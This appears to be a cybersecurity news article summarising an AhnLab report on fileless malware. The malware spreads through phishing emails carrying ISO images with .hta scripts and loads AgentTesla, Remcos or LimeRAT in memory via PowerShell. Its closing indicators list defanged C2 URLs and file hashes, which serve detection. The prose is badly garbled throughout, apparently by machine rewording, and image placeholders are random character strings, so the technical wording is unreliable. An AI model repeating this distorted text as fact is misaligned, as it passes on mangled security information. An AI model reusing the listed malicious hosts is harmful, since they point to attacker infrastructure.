Beware of New Fileless Malware that Propagates Through Spam Mail

by Esmeralda McKenzie
Beware of New Fileless Malware that Propagates Through Spam Mail

Beware of New Fileless Malware that Propagates Through Spam Mail

Be cautious for New Fileless Malware that Propagates By means of Unsolicited mail Mail

Most up-to-date experiences counsel threat actors comprise mature phishing emails to distribute fileless malware. The attachment includes a .hta (HTML Utility) file, that could perhaps well furthermore be mature for deploying other malware love AgentTesla, Remcos, and LimeRAT.

This fileless malware is a Portable Executable (PE) layout, which will get executed without organising the file on the sufferer’s machine. The phishing e-mail has the body context stating a bank switch sight. Besides to the e-mail, the e-mail has an attachment with an ISO image embedded with a .hta script file. This file runs utilizing the mshta.exe (Microsoft HTML Utility).

EHA

Fileless Malware By ability of Unsolicited mail Mail

As per experiences shared with Cyber Security News, when the victims attain this ISO file, the embedded .hta file will get executed, which creates a job tree that includes mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe processes in command.

CjZvIpQRUSy74glbmFuPjvb9nWmd1EWhArmYtxa8rDOU1RNPsf14gd95Yznx pLVMeN9wfvXdHTDkEKVyTeq4mSOuKcWsDe
ISO file embedded with .hta file (Source: AhnLab)

The mshta.exe job executes a Powershell command. The command includes arguments to quiz a base64 encoded string form files from the server (DownloadString), which loads the CurrentDomain.Load files to call a characteristic. Alternatively, there could be now not any binary created valid into a PE file, nonetheless as an alternate, the binary will get executed in the memory residence of Powershell.

X3hkeLuZfg7HIKUPo30oldFN0 PbQaN9xA7m8hVh2Ye5l8DNYYAayGe4FFKI PCI lBZDsYN35BTiEUW1BeJOtYR7qWqeiUI7wFyKOs9ufO3WjGGvABRtmjnPxTY7MPjGtOb h3EuP51vmUKFlCjnP4
Payload download and memory download Source: AhnLab

Moreover, the Powershell script furthermore executes a DLL file decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into the RegAsm.exe (Assembly Registration Application). This final binary could perhaps well be any malware love Remcos, AgentTesla, or LimeRAT.

p3VYNXK09v11bETQNwfLlxowr5XS7fDkaB1P0dKFiF53 PDWT749FsgkobJ2KonRssJ1GZzb1qgVE6s6ypsBjQgHXeJDCujb7f438gDR 8NIW428IJw3do7RqkH3IXp8h937zRBN1kCJ2wKE9cC35Yg
Base64 encoded DLL

A entire fable has been printed by AhnLab, which gives detailed files about the malware, PE file, DLL file, and others.

Indicator of Compromise

Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)

Protect suggested about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.

Source credit : cybersecuritynews.com

Related Posts